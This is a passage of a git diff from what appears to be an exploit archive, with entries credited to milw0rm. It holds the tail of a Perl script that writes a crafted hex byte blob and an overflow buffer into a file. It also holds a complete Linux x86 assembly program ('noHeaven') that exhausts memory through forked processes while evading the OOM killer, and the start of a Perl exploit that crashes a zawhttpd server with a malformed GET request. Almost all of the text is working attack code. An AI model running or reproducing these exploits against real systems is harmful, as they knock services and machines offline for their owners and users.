+"\x41\x1C\x6F\x92\x5A\x4C\x13\x1B\x0A\x13\x00\x9D\x91\x55\x62\x5D\x73\x03\x0C\x40\x07\x4C\x06\x1D". +"\x4E\xBD\x02\x44\x37\xDF\x52\xC9\x04\x46\xE4\x91\x01\x90\x01\x4D\xCD\x9E\xC0\xFC\x2E\x17\x8E\x9B". +"\xC0\x50\x00\x55\x5D\x08\x87\xB5\x10\xC4\xC8\x4A\xDB\xE7\xC8\x43\xE9\x06\x82\x00\x96\xC5\xCC\xD4". +"\x49\xD9\x24\x10\x90\x0D\x64\x49\x60\x6B\x24\x6F\xAA\x8C\x5E\x5C\xB2\xE2\x11\x3D\x16\x46\xF4\x0E". +"\x59\x89\x27\xA5\x25\x5F\xC0\x0B\x1B\x81\x87\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x01\x33\x0C\x00\x00\x08\xDA\x24". +"\x00\x00\x1C\x0C\x00\x00\x5B\x02\xF9\xD3\xA9\x15\x7E\xF5\xB4\x21\x0E\x35\xD5\xDB\x61\x48\x35\x29". +"\xBE\xFC\xBE\x57\x67\xF9\x4A\x92\xA3\x3A\x52\x66\x3C\xA9\xE8\x4B\x5C\xC6\xC1\x30\x43\x60\x24\x73". +"\x59\xD0\x5B\xA9\x45\x2B\xA7\xE2\x80\x3C\x1B\x3E\x42\x31\x94\xC6\x49\x86\x70\x87\x08\x3A\xFA\x6F". +"\x12\xBD\x89\x31\xA1\x52\xE8\x37\x6D\xA6\x99\x86\xA6\x68\xC4\xC6\xC1\xF0\x84\x11\x38\x80\xA1\x07". +"\x03\xAA\x14\x6F\xBF\xE1\xDD\x9F\xB8\xA0\xBF\x93\xD1\x4D\x6A\xAB\x83\xA9\xEF\xF3\xF6\x01\xCB\xBF". +"\x3F\x9C\xCF\x0F\x8B\xF1\x57\xED\x03\x9E\xBB\x59\xBE\xE5\xFC\x9C\x6F\xDD\x1D\x7F\xFC\xB3\xC3\xA3". +"\x67\xE1\x1B\x97\xE9\x72\x55\xC1\x50\x31\x18\x5C\x28\x03\x4C\x06\x12\x93\x44\xA7\x36\x25\x43\x8C". +"\x7A\xBB\x04\xFE\x16\x80\x43\xF1\x9C\x6F\x1F\xE1\x3D\x53\x1C\x03\x9F\x28\x6B\x8F\x28\x73\x5C\xD9". +"\x4D\xCB\x2C\xCC\x96\x16\xA3\xE5\x98\xC3\x31\xB3\x39\xD2\xA9\xCC\xC5\x4A\xFC\xA7\x97\xDF\x6A\x7A". +"\xE6\xDC\xB0\xBD\x4A\xBC\xC0\x31\xC6\x65\xD7\xA3\x99\x0F\x85\x28\x4B\x4B\x18\x0B\x30\x60\x26\xBE". +"\x06\x97\xBF\xFC\xA2\x9E\xDE\x1E\x42\x63\xA7\x21\xC4\xD0\xD6\x48\x9E\x69\x37\xAC\x60\x60\x98\xAE". +"\x12\x2B\xF1\x58\xB3\xCD\x2D\x2C\x8D\x0E\xBF\xE1\x99\xF8\xA2\xA0\xAB\x0A\x9E\xD6\xAB\x0C\x26\x1B". +"\x0C\x00\x80\xC0\xA7\xFF\xCC\x55\x50\xCC\xA8\x04\xA7\x54\x88\x2C\x85\xC1\x38\x3D\x29\x5E\xA4\x27". 
+"\xB2\x62\x86\x50\x95\x24\x08\x47\xF2\xCC\x49\x25\x39\x59\x06\x52\x10\xB7\x92\xAF\x1A\x8C\xBE\x82". +"\x33\x6B\xD5\x88\x95\x69\x3A\x72\x8F\x14\xD1\x81\xD1\xCB\xC2\x57\xA0\x5C\xB6\x25\x99\xF1\x04\x3A". +"\x0C\xD0\xE2\x00\xFC\x89\x0C\xC8\xA2\x4D\xFD\x40\xF0\xCA\xAC\x02\x4C\x3B\x1B\xCF\x4B\x10\x5D\x5E". +"\xCC\xE7\x6B\xEC\x66\x54\x5D\x1B\x22\x3F\x1A\xAC\x1D\x6B\x32\x5B\x97\xFF\x2E\x51\x6B\x13\x55\x7C". +"\xBE\xC6\x44\x46\x93\x9E\x29\xA5\xBB\x8C\x87\x76\x80\x80\xC6\xA3\x1E\x92\x22\x0D\xB0\xA7\xEC\x02". +"\xA3\x4C\x3B\xB8\x10\xF7\xB8\x93\x8D\x8C\xC0\xD1\x18\x0C\x82\x74\x86\x40\x46\x3C\xE1\x60\x5F\xC1". +"\xBA\x2A\x86\xD8\x58\x49\xFB\xAA\x24\x50\x3F\xD5\x60\xFC\xCE\x17\xFB\x7E\xDF\xA6\xF9\x9D\xDD\xBF". +"\xFF\xFB\xE9\x9D\x51\x7A\xFF\x03\x85\xDE\x97\xFA\x3B\x07\x03\x0C\x54\x56\xD8\xA3\x6E\x5F\xB6\x5E". +"\xA3\xDE\xBB\xE3\x85\x03\x4E\x68\x40\x8D\xF8\xB3\x04\xC4\xE6\xE6\xB3\x57\x1A\x46\xEF\x70\xF4\xEB". +"\x92\xA0\xE2\xAB\x62\x8E\x5F\xF9\x44\x9E\x80\xB5\xA7\x95\xFE\xFD\x5A\x9F\xB6\x55\x16\x84\x05\x24". +"\x88\x9C\xD0\xD9\x89\xD0\x35\xE2\x1E\x24\x46\x7D\x07\x02\xC4\x2B\x1D\x8F\x23\x36\xBE\x54\x17\x32". +"\x5F\x50\x78\xA4\xFA\x60\xFC\x08\x51\x4B\x54\x3F\x8D\x1F\xB6\x83\xE1\x80\x45\xC5\xD3\x22\x9B\xEA". +"\x73\x21\x1C\x79\x58\xA0\x0B\x3E\x09\xCE\xF3\x82\x00\x00\x08\x5D\x02\x90\x01\x00\x00\x64\x00\x82". +"\x01\x8E\x0E\x00\x00\x08\xDA\x24\x00\x00\x1C\x0C\x00\x00\x6C\xFE\x6C\xF7\x9B\xAF\x3A\x36\x20\xBA". +"\x88\xA4\xFE\xBD\x59\x00\x1F\x87\xCB\x02\x92\x5C\x43\xE4\x30\x9D\x80\xC7\xC5\x94\x54\x0C\xDC\x0B". +"\x1D\x97\x87\x8F\xFF\xCF\x2B\x64\xE1\x14\x95\x2A\x93\x08\xB3\x86\x45\xBE\x92\x29\x2F\xAF\x4C\x71". +"\x8A\xFF\x4F\xE0\x87\x48\x0E\xC7\x36\x0D\x8A\x09\x48\x47\xCE\x05\x15\x1F\xB5\x3C\x56\x55\x65\xD6". +"\xF6\x0D\x70\xC5\x5F\xCD\x51\x4F\x14\x73\xAA\x3F\x4C\xED\xB6\x43\xE0\xBB\x8F\xB4\x02\x2F\xE8\xBF". +"\x8C\x8C\x5F\x41\x89\x89\xD3\x81\x38\xBE\xDB\xF0\x34\xAD\x1C\xF8\xA1\xE8\x17\xA0\xE8\x69\x53\x61". 
+"\x91\x18\x6C\x54\x87\x75\x2C\xD1\xA1\x56\x80\xF3\x47\xB9\x1A\x7A\x79\x42\x09\xBD\x5A\xDA\x64\xA4". +"\x92\x74\x7D\xC8\xE4\x49\x3F\x30\x66\x67\xB6\x57\x4F\x41\xC7\x33\xA2\x03\x84\x89\x5C\x0C\x75\x55". +"\x33\x27\x41\x68\xC1\xF0\x11\x85\x54\x55\xD0\x51\xF6\x2B\xFC\xBE\x52\x06\xA0\xF5\x45\xE6\xFB\x56". +"\xFF\x7D\x01\xD2\xD2\x7B\xAB\x55\xE1\xFC\x97\xDF\x93\x36\x51\xEE\x72\xFA\x49\x66\xA7\x8C\x11\x90". +"\x1E\x71\xF5\x68\x01\x3A\x31\x33\x62\x0F\xC9\x99\x98\xA1\xDD\x55\x57\x85\x25\xE4\xB2\xAC\x7A\x4A". +"\xA8\xFE\x1A\x03\x80\x4A\x64\x09\xAC\x35\xE9\xA5\x31\x8E\x96\xDE\x1D\x73\x7F\x55\x46\x27\x38\x9F". +"\xAA\x69\x6A\xF9\x96\x9F\xB4\x03\xF1\x52\xA5\x03\xC5\x5F\xF5\xEF\x54\x89\x31\xBA\xCD\xA5\xD6\x81". +"\x31\x18\x75\x93\x1D\x55\x59\x21\x80\xD0\x61\x50\x9C\x44\x8A\xC6\xB2\x44\xF3\x81\xB4\x96\x5F\x5C". +"\x7F\xBB\x84\x92\x9F\x82\x3D\x0D\xD3\x28\x30\xA8\xAE\x30\x12\xF8\x92\x27\x98\xA9\x4E\x54\xB3\x8C". +"\xC9\xD7\xFA\x2A\x77\x8A\xD0\x56\x5D\x01\x28\x59\xA3\xA7\x51\xC5\xED\xFA\x8A\xA9\xB8\x14\x74\xEA". +"\x38\x82\xC8\x4B\x1C\x4C\x05\xCA\xC4\x76\x42\x16\xF0\x20\xAB\x4E\x5B\x20\xEF\xE2\xE0\xE6\x94\x1C". +"\xC2\x06\xA0\x17\xA3\x08\x06\xB0\x39\x13\x9D\x02\xFA\xA8\x91\xD2\xC8\xB5\x0B\x4F\x8E\x0C\x1D\x01". +"\x4C\xE0\x52\xD1\xDD\x85\x9B\x86\x62\x72\xB0\xA5\xEC\x60\x04\x9F\xF5\x5C\xA5\x7A\x50\xD8\xA4\x01". +"\x89\xDE\xCD\x50\x53\x68\xC8\x01\xC3\x10\xEE\x0E\xB2\xEF\x48\x1A\x9C\xFA\x80\x3C\x5F\x94\x44\x57". +"\x9B\xEF\xA4\x51\x6F\xDB\xB2\x6F\xFD\x3D\xB5\xBE\x1F\x2D\xF7\x2A\x5B\x49\xA4\xD3\xA4\x37\xB0\x93". +"\x11\xE0\x4C\x0B\x5B\xDC\x06\x13\x37\x2F\xBB\x08\x1A\x40\xAD\x88\x00\x66\x86\x0B\x37\x43\xC0\x7C". +"\xA1\xFF\x82\xB8\x81\x53\x0A\xD2\x4B\xCB\x98\x44\xBB\x3D\xEF\xC5\x03\xC5\x5E\xC6\xE4\xF6\x81\xFB". +"\x59\x66\x4F\x24\xFD\xB5\x33\xA5\x5F\xFC\xA2\x2A\xC1\xEA\xB9\x37\x67\xB9\x07\x93\xF1\x76\x7B\xC6". +"\x0F\x9F\x96\x92\x5F\x9E\xE8\x86\xF6\x83\x95\x09\xD7\xAA\x69\xC2\x3B\x25\xEA\x02\x21\xFA\x23\xAD". 
+"\x1F\xA7\x11\x21\x45\x82\xC2\x12\xEC\x78\x1F\x44\xF1\x2A\xC8\xBD\xB2\xC5\xA0\x1C\x03\x5E\xBF\xA4". +"\x0A\x5E\xF0\x77\x52\xF8\x1C\xA0\xE9\x00\x9C\xE9\xA7\x90\x9A\x70\x72\xE7\x9F\x51\xF4\xAF\xD7\x0E". +"\xFF\xF1\xFD\x86\x32\xC5\x7F\xBC\x59\x0A\x02\x64\x22\x5C\x4C\x60\x5B\xE7\x12\x6C\x1D\x6C\xCE\xA2". +"\x54\xBB\x71\x9F\x55\x6B\xE9\x0E\x80\x4E\x23\xD4\x4D\x62\x54\x9F\xE2\xF9\x60\xA2\x86\xC3\xE8\x5E". +"\x0E\x62\x8D\x9E\x87\x8F\xC0\x6D\x88\xA0\x63\x95\x3E\x8A\x90\x4F\x02\x81\x89\x18\x06\x40\x78\xC4". +"\x48\xD9\xD0\x0B\x73\x09\x2F\x4C\x37\x64\xCC\x38\xC9\x5D\xA4\x00\x19\xE1\x7C\x65\x30\x42\x57\x3B". +"\xD1\xDD\x6E\x6E\x87\x16\x5B\xBA\x53\xF7\x31\xA7\xD9\xE5\x99\x9B\x12\xA4\xD2\x80\xB2\x3D\x85\x57". +"\x8A\x40\x2C\x35\xAD\xA2\x78\xD0\x11\x3E\xC9\x62\x99\x0E\x59\xA7\xF2\xC0\x76\xE2\x19\x88\xCE\xE5". +"\x9E\x2F\x11\x7C\xA0\x0A\xAA\xF6\xA3\xBB\x2B\x8A\xD6\x3A\x6B\xDF\x12\x17\x04\xC1\x31\x54\x2C\x2E". +"\x6E\x03\x9A\x59\x51\xD1\xE4\xB8\x65\x7B\xFF\xEC\x94\x47\x64\x6A\x51\xA3\x92\x80\x25\xDA\xB4\xB6". +"\xE9\x2B\x57\x4B\xD4\x28\x0C\xD6\x21\x51\xB4\x3E\x99\x01\xE2\xA3\x7C\x5A\x14\xE4\x18\x51\xB2\x04". +"\x75\x5F\x89\x1F\xA0\xED\xFA\x50\x2D\xBD\x61\x84\xB8\x49\x4F\x51\x2A\xAA\xFD\xF3\x20\x53\xCA\x78". +"\xB8\x7A\xE2\x71\x67\x6A\x40\xF8\x89\x88\xC7\x25\x4D\xE3\xC0\x03\x37\xAC\x89\x4E\xAA\xFC\x52\x7E". +"\x78\x6D\x5C\xAC\x7B\xA3\xB7\xA6\x4F\x62\x5B\x4E\x63\x07\x5D\x0E\x39\xA4\x18\x9C\x91\x14\xC8\x1E". +"\x4B\x24\xDA\xD1\xA6\x3A\xDA\x5E\x62\xC3\xC1\xAA\x11\xA7\x20\xF6\x8E\xE0\x3B\x77\xC2\x46\xA8\xCE". +"\xE8\xF9\x4C\xBF\xE8\x3B\x2A\x28\x18\x86\x98\x5A\x82\xAA\x80\x8C\x06\x88\x2B\x67\x10\x97\x7F\x54". +"\x91\xB5\x49\xB7\x37\x30\x50\x9D\x80\x4A\x29\xCE\x4E\xCB\x56\x50\x80\x95\x1F\x38\x0D\x1D\x1D\x10". +"\x17\x8B\xE2\x8A\xB4\xCD\x3B\xF1\xB2\x43\x18\x6A\x39\xF4\x0F\x4D\xD9\x3D\x16\x92\x77\xAA\x07\x43". +"\x37\xDC\x23\x61\x9B\x56\x4F\xAA\x80\xAA\x80\xFF\x73\xB1\x8A\x64\xF6\xD1\x0C\x52\x00\x46\x15\xDE". 
+"\xC8\x32\x20\xE2\xD1\xD0\x1A\x8A\xC4\x6B\xCC\x67\x31\x87\x9B\x46\x52\x2C\xDF\x73\x73\xB9\xA3\xAD". +"\x55\xA9\x35\x48\xF2\x54\xBF\x4A\x78\xA4\xF4\x76\x56\x46\xC3\x22\x1E\x75\x4E\x08\xF0\xDD\xFB\xC5". +"\xB1\xFF\x00\x20\x42\x35\xF5\xC2\x25\x22\x99\xC0\x9B\x95\x07\x66\xBD\xB2\x48\x85\x42\xCF\x02\x40". +"\x14\xA9\x03\x92\xEF\x75\xA6\x9A\xCE\xB1\x46\xF5\xAE\xBF\x38\xDD\x11\xA0\xF2\x35\xC9\x58\x4F\xAD". +"\x95\x12\x11\xA0\x8D\xBA\x6D\x60\x1F\x50\x9A\x68\x1D\x05\x6D\x5C\xA6\x93\x18\x55\x4B\xE1\x1E\x55". +"\xDD\xD3\xCD\x5A\xB6\x0B\xCA\x45\x1F\xA5\x6F\x08\x85\x97\x1B\x12\x14\x6D\x2F\x29\xFA\x9A\x22\x40". +"\x62\xE4\x83\xDD\xCB\xEA\x29\xD0\x43\xB9\xCC\x1A\xD1\xBE\x56\x23\xA8\xCC\x49\x3D\x88\x85\xA4\x20". +"\xD8\x0F\xC0\x9D\x8A\x2C\xF7\x64\xC3\x16\x05\x39\xDB\x15\x64\x97\xF4\x0D\xFC\xB4\x4D\x6C\xA2\x0B". +"\xCB\x56\x14\x34\x12\x86\x4D\xA6\xEE\xDB\x15\xAA\xA9\x00\x24\xE5\x9C\x32\x17\x58\x75\x43\xC4\x50". +"\x8A\x41\xCE\xF3\x82\x00\x00\x08\x5D\x02\xF4\x01\x00\x00\x64\x00\x82\x01\x7A\x13\x00\x00\x08\xDA". +"\x24\x00\x00\x1C\x0C\x00\x00\x59\x97\x68\x41\x07\x19\x01\x8E\x15\x2B\xA8\x6C\xCE\x1E\x8A\xDB\xA6". +"\x2D\x1E\x4E\x2D\xC0\x50\xCB\xD2\x79\x86\x72\xAE\x1F\x92\x2D\x84\x50\xED\xF3\xD5\xBA\x46\x7E\x05". +"\xD4\x9C\x36\x28\xE9\x4A\x06\x1D\xF4\x7D\xD1\xEB\xAF\x47\x96\x02\x4B\x6C\xAD\x89\x0B\x03\x80\x31". +"\x62\x27\x37\x15\x87\x2F\xA1\xFD\x14\x2D\x15\xB9\x08\xB7\xA3\x56\x47\x6B\x84\x21\xDC\x48\xA3\xC1". +"\x38\x53\x58\xB6\xDF\xE8\xDB\x23\xC9\x8F\x22\x44\x57\x83\x38\x9E\x2E\x11\x6A\x8E\x33\x3B\xED\x59". +"\xAA\xF2\x81\x52\xF4\x8C\xE1\x04\x12\xE7\x60\x05\x2F\xEA\xB3\xBA\xA9\xFA\x67\xCE\xEC\x20\x28\xFD". +"\x80\x52\x0F\x55\xDA\xA1\x24\x3F\x94\xB8\x4A\xA3\xFB\x73\x24\x0A\x0A\x30\x64\x6B\x67\x6F\xEA\x87". +"\x34\xE9\xD8\x8A\x18\xC5\x04\x38\xD0\x94\x9B\x70\x1F\x95\x17\x0A\x48\x3B\x03\x66\xDF\xB0\xFF\x99". +"\x18\xD9\x51\x0F\x3D\x72\x25\xB7\x62\xCB\x9A\xD8\x95\x7C\x3E\x53\xFB\xB6\x88\xC3\xA8\x39\xA5\xAB". 
+"\x0D\x0F\xC7\xAE\xB7\x70\x3D\xAB\xDB\x44\xDA\xB2\x9C\x21\x7A\x72\x48\x8A\x68\xC0\xFB\x89\x5A\xB4". +"\xD3\x1E\xAE\x8F\xD6\x86\x0E\xBD\xD8\xC6\x02\x09\xC0\x24\x5B\x42\xB1\xAF\x50\x8E\x17\x56\x8A\x75". +"\xEB\xD3\x30\xD0\xBF\x32\x64\x4A\x05\xFF\x95\x76\xD4\x7B\xDB\x12\xEE\x43\x4F\xD0\x4B\xC5\x05\xE2". +"\x5A\x9F\x6D\xBC\xF1\x70\x1E\xDD\xAC\xE7\xEC\x6E\x64\x51\x26\x36\x74\x25\x0E\x36\xEF\x21\x13\x47". +"\x8A\xF6\x21\x42\xF3\x20\x9C\xEE\x18\xFC\x72\x16\x29\xEE\x3C\x0B\x25\xAC\xAA\xA0\x29\x69\xA8\x6C". +"\x2B\x5A\x84\x35\xA6\x57\x64\x1D\xF8\x14\xCB\xD9\x24\x28\x60\x5C\x4F\xB5\xFF\xEA\x48\x61\xBB\x44". +"\x35\x2D\x6E\x69\xC9\xA2\x41\x05\x65\x41\xC4\xC8\x36\xC9\x13\xCD\x16\x90\xFE\x11\xB6\x35\x9E\xA9". +"\x47\x37\xC8\x63\x30\x29\x16\xC0\x4C\x08\x2B\x13\x08\x91\xD0\xDB\x24\x4F\x30\x4C\xCB\x7D\x75\xC5". +"\x55\x01\xD4\xA3\xC1\xD9\x87\x21\x39\x1A\x00\xC1\x48\x64\x8E\xDC\xAC\x2C\x00\x2E\xF6\xFC\x40\xD8". +"\xDB\x2B\xB7\x56\x33\x10\xA1\x02\x23\x3E\xC2\x0B\x63\x00\x2E\xAE\x8C\xC4\x08\xAB\x6D\xA6\x45\x71". +"\x04\xEA\x6C\x7C\x5F\xA8\x6F\x44\x7F\x7B\x6B\x1E\x1E\xFD\x44\xDB\x72\x33\xD8\xDF\x27\xF3\x7C\x7C". +"\xA0\x17\x61\x58\x97\xB2\x0A\x12\x00\x0A\x45\xD4\xA9\xCC\xC9\xE7\x0C\x4A\x52\x5C\x40\x64\x63\x9F". +"\x1D\x49\x38\x56\x26\xF1\x9A\xCA\x08\x6D\xC7\x9E\x83\xE1\x82\xD6\x3E\xD4\x79\x8C\xF4\xFD\x1D\x5A". +"\xD6\xEE\x48\x95\xAF\x72\xA4\x95\xA7\xD3\x55\x7A\x0F\xF7\x96\x58\xBC\x9E\x50\x83\x3C\x9D\x96\x4F". +"\x94\x65\x13\x9C\x20\x80\x54\x26\xB3\xB5\x59\x22\x74\x4D\x6A\x74\x43\xE1\x9E\x23\x3E\x55\xB9\xE5". +"\x1F\x9A\x19\x60\x2E\x12\xD5\x97\x51\xD0\xC8\xA0\x70\x00\x58\x2F\x01\xC8\xA5\x29\x5B\x86\xCA\x27". +"\x20\xD9\xA4\x1C\x05\x28\x53\xE0\xE3\x9B\x53\xE1\x16\xC4\x46\xDC\xAA\xAF\x55\xAC\x22\x40\x32\xB9". +"\xC4\x93\x5A\x2B\xAF\x0B\x79\x02\xF9\x01\xD2\xBB\x9E\xFA\x0C\xDB\x83\x0C\xEA\x9E\x64\xD4\xE7\xB4". +"\x99\xDD\x71\x28\xA3\x3C\x43\xEF\x4B\xAF\x23\x79\xD5\xF9\xC7\x87\x42\x71\xF8\xCD\xF3\x08\xEA\x26". 
+"\xD7\x30\xD2\xF9\x4D\x2A\xF2\x85\xE6\xA1\x4E\xFD\x92\x05\xAD\x0D\x63\xA8\x47\xBC\x0A\x02\x59\xC0". +"\xCC\x8D\x07\x07\x4D\x1E\x00\x91\x99\x69\x3C\xD2\x65\x58\x33\x4B\xEC\x3D\x94\xBF\x66\x60\x64\x46". +"\x1D\xC8\x23\x14\xAB\xEA\x58\xAC\xAC\x23\x73\x19\xEF\x5A\xFA\x93\x38\xA3\x80\xD5\x89\x44\x5C\x29". +"\xCA\x94\x01\xC0\x15\x89\x9C\xEA\x34\x8E\xA5\x10\x1C\x0F\xA6\x7F\xCD\x0D\xCF\xD5\xF5\x5F\x54\xB7". +"\x58\x64\xF9\x42\x70\x9D\x9C\x9E\x28\xD8\x2A\xAA\xB6\x87\xBF\x55\x32\x09\xE4\x0C\xB2\x0A\x01\x11". +"\xAD\xE1\x5E\xE4\x97\x63\xEC\x21\xF7\x8D\x81\x50\x92\x3F\x1F\xD8\x08\x5E\xC2\xE5\x4D\x17\xFF\xF8". +"\xA5\x4C\x05\x27\xB7\x9C\x18\x67\x6A\xA2\xE1\xF1\x70\x1B\xBE\xBD\xAD\x97\xF3\x30\x0C\x78\xAE\xB4". +"\xB1\xF2\x8F\xFC\x6A\x11\x63\xCD\x22\x1C\x04\xF6\x11\xFC\xFF\x22\x4B\x28\x3E\x93\xDE\x6E\x38\x77". +"\x13\x8D\x40\x5E\x3B\x22\x07\xDC\x60\x8F\x62\x7B\x9A\x62\x02\x26\xF7\xEC\x8C\x5D\x46\x7B\x2E\x31". +"\x2D\xFD\x02\xB5\x58\xF6\xA1\xF8\xAB\x38\x12\xFE\xA7\xEA\x58\xCF\x66\x2D\xBB\x6C\x02\x34\xF9\x40". +"\x8B\xDB\xA0\xA0\x59\x19\x18\x68\x00\x0B\xF3\x03\x03\x63\x58\x3D\xE0\x65\x50\x19\x86\xEC\xCD\xB3". +"\x22\xC2\xF4\x97\xE2\xA6\x75\xDA\xDD\xC8\x1A\x43\x02\xA8\xC0\xE5\x34\xE8\xA4\x63\x73\x10\x2A\xC7". +"\x1C\x24\xE9\xB4\xE3\x5E\xA6\xF3\x18\xC4\x2D\x6D\xE4\x5A\x67\x87\x5C\x6C\x91\xC5\x3B\x54\xDF\x59". +"\x9D\x11\xA8\xF6\x64\x63\xF7\xF7\xDD\xF2\x80\x52\x56\x73\x1E\xE0\x69\xFA\x71\xB3\xA4\x0A\x3E\x7A". +"\xEE\xE9\x4E\xD7\x00\x48\x7E\x72\xE2\x65\x6F\xC8\xCB\x2D\x48\xF1\x9B\x72\x34\x35\x8F\x2E\xD0\x71". +"\x20\x99\x6A\x29\x51\x50\x44\xBC\xB3\xFA\x44\xA4\x06\xF8\x12\xE7\x5D\xAF\xFD\x48\xE2\x13\x7D\x55". +"\x60\x68\x1B\x71\x06\x20\xE3\x42\x33\x58\x68\x9F\x86\x05\x45\x62\x5C\x74\x69\xA3\x1D\x05\xC1\x14". +"\x0C\xD0\xA6\x4A\x93\xE9\x14\xEA\x78\xC1\xDD\xC5\xC0\x52\xCC\xAB\xAC\x9C\x83\xA2\x78\x84\x72\x98". +"\x64\x45\x18\xC0\xC3\xF9\xC8\x50\x8A\xF1\x51\xD0\x6E\x49\x72\x9F\xBC\xE1\xD2\xF3\x49\xB1\xD0\xE8". 
+"\x5C\x13\x11\x41\x6F\x54\x0B\x66\x52\xF0\x76\x4E\x1B\x23\xB3\x2C\x01\x22\xCE\x08\xD3\xA0\x79\xE0". +"\xC8\x1A\xB9\x47\x5B\x47\x40\x24\xCB\x37\x95\x62\x8C\x8E\x2E\x76\x7B\xB7\xF8\xDC\x02\xEC\x01\x8B". +"\x2D\x50\x05\xFC\x23\x9B\x1A\xC5\x2A\x7C\xA3\x24\xEC\xDB\x6A\xF8\x5D\xEA\x5F\xCB\x9B\xFF\x48\xC0". +"\x8E\x0E\x70\xA4\xE2\x60\x4B\x24\xA1\x9A\xE5\xB9\x8B\x07\x73\xF1\xD1\x48\x08\x48\xDA\x5B\x48\x9B". +"\xD9\x3F\x8C\x71\xE0\x11\xA6\x72\xDE\x27\x42\x45\x99\x68\x48\xB1\x64\x87\x80\xDC\xA5\x68\x8A\x5A". +"\x9F\x4E\x73\x6E\xD0\xF5\x1E\xE7\xFC\xD5\x61\x95\x1F\xF2\x88\x56\xA3\x45\x56\xCE\xF3\x82\x00\x00". +"\x01\x5D\x58\x02\x00\x00\x64\x00\x82\x01\x03\x00\x00\x00\x00\x08\x80\x02\x00\x00\x5C\x0E\x00\x00". +"\x80\x02\x2A\x00\x00\x76\x7E\x5A\x0C\xA0\x88\xE8\x44\x3D\xAA\x40\x58\xA4\x26\x9A\x5F\x04\x21\x26". +"\x19\x06\x04\x81\x76\x84\xEB\x72\x64\x3F\x20\x25\x33\x50\xF7\x17\x6F\xD6\x6C\x35\x9E\xDC\x95\x32". +"\x60\x1D\xB5\xB3\x1B\x07\x50\xCD\xCE\xBC\x7B\xE5\xBD\xED\xE3\xAB\xF1\xA0\x10\x10\x55\x74\x32\x1F". +"\x2E\x20\x25\x29\x9C\xA0\x0A\x88\x80\x93\x49\x75\xA9\xBD\x98\x02\x6A\x90\x10\x6A\xA0\x24\x9A\xCC". +"\xE5\xC0\x32\xB9\x8C\x99\x8D\xE9\x8C\xD0\x63\x3A\x18\xC5\xE0\x25\xA4\xC2\x64\xB0\x80\x60\x55\x83". +"\x2B\x9D\x0E\x49\xBA\x1E\x3A\xFF\x11\x81\x01\x05\x67\x43\x21\xED\x46\xD4\x29\x28\x7D\x48\x45\x00". +"\xC1\x93\x2D\x8B\x8A\x24\xC4\x98\x50\x00\x19\x08\x84\xD2\x10\x19\x21\x7C\xF6\x0A\x50\x1B\x0A\xEB". +"\xB6\xC9\x8D\xB2\xE0\x40\x2D\x88\x98\x06\x0C\x16\x90\x77\xAB\xDD\x08\x10\xA9\x2F\x1D\x7F\x79\xC1". +"\x40\x82\xB3\xA1\x90\xF6\xAE\xC0\xA7\xC0\x96\x00\x9D\x02\x43\x42\x9B\x22\x03\x4A\x49\x20\x01\x54". +"\xC4\x03\x00\xC8\x30\x43\x24\x67\x20\x41\x92\xD6\xEB\x51\x99\xB5\x24\x12\x21\xA4\x96\x13\xB9\x98". +"\x99\x6B\x8D\xC0\xC5\x3E\xBC\x74\x7E\x2C\x00\x01\x15\x67\x43\x21\xEE\xE0\x94\xBF\x6A\x50\x8C\x8E". 
+"\x10\xD0\x8D\x46\x8C\x84\x41\x41\x32\xE1\x78\xEB\xFD\x41\x06\x00\x05\x78\x43\x21\xF3\x7B\x02\x4B";
+
+
+for ($i = 0; $i < $len; $i++) {
+$buffer .= "\x41";
+}
+
+open(EGG, ">$EGGFILE") or die "ERROR:$EGGFILE\n";
+print EGG $header;
+print EGG $buffer;
+print EGG $end;
+
+close(EGG);
+
+# milw0rm.com [2006-04-04]
diff --git a/platforms/linux/dos/1657.asm b/platforms/linux/dos/1657.asm
index adb54b46d..3c08f9436 100755
--- a/platforms/linux/dos/1657.asm
+++ b/platforms/linux/dos/1657.asm
@@ -1,44 +1,44 @@
-;nasm -f elf noHeaven.asm
-;ld -s -o noHeaven noHeaven.o
-
-section .text
- global _start
-
-count equ 8 ; threads count - do it quicker
-
-_start:
- mov ebx, count
- call create_threads
- jmp done
-_pause:
- mov eax,29
- int 0x80
- ret
-create_threads:
- mov eax,2
- int 0x80
- test eax,eax
- jz consume
- dec ebx
- test ebx,ebx
- jnz create_threads
- ret
-consume:
-setsid: ; so we won't get counted as one thread in oom_killer()
- xor ebx,ebx ; each task will have about 20 oom_score which
- mov eax,66 ; is less than 'init' and others
- int 0x80
- push eax
-loopek:
- mov eax,259
- mov ebx,0
- mov ecx,0
- mov edx,esp
- int 0x80
- jmp loopek
-done:
- xor ebx,ebx
- mov eax,1
- int 0x80
-
-; milw0rm.com [2006-04-09]
+;nasm -f elf noHeaven.asm
+;ld -s -o noHeaven noHeaven.o
+
+section .text
+ global _start
+
+count equ 8 ; threads count - do it quicker
+
+_start:
+ mov ebx, count
+ call create_threads
+ jmp done
+_pause:
+ mov eax,29
+ int 0x80
+ ret
+create_threads:
+ mov eax,2
+ int 0x80
+ test eax,eax
+ jz consume
+ dec ebx
+ test ebx,ebx
+ jnz create_threads
+ ret
+consume:
+setsid: ; so we won't get counted as one thread in oom_killer()
+ xor ebx,ebx ; each task will have about 20 oom_score which
+ mov eax,66 ; is less than 'init' and others
+ int 0x80
+ push eax
+loopek:
+ mov eax,259
+ mov ebx,0
+ mov ecx,0
+ mov edx,esp
+ int 0x80
+ jmp loopek
+done:
+ xor ebx,ebx
+ mov eax,1
+ int 0x80
+
+; milw0rm.com [2006-04-09]
diff --git a/platforms/linux/dos/1746.pl b/platforms/linux/dos/1746.pl
index 541bc2a2c..464eb0acd 100755
--- a/platforms/linux/dos/1746.pl
+++ b/platforms/linux/dos/1746.pl
@@ -1,26 +1,26 @@
-#!/usr/bin/perl
-# zawhttpd Buffer Overflow Exploit
-# by Kamil 'K3' Sienicki
-
-use IO::Socket;
-use strict;
-
-my($socket) = "";
-
-if($socket = IO::Socket::INET->new(
- PeerAddr => $ARGV[0],
- PeerPort => $ARGV[1],
- Proto => "TCP"))
-{
- print "Attempting to kill zawhttpd at $ARGV[0]:$ARGV[1] ...";
- print $socket "GET \\\\\\\\\\\\\\\\\\\\ HTTP/1.0\r\n\r\n";
- close($socket);
-}
-else
-{
- print "perl zawhttpd.pl localhost 80 \n";
- print "Cannot connect to $ARGV[0]:$ARGV[1]\n";
-}
-#EoF
-
-# milw0rm.com [2006-05-04]
+#!/usr/bin/perl
+# zawhttpd Buffer Overflow Exploit
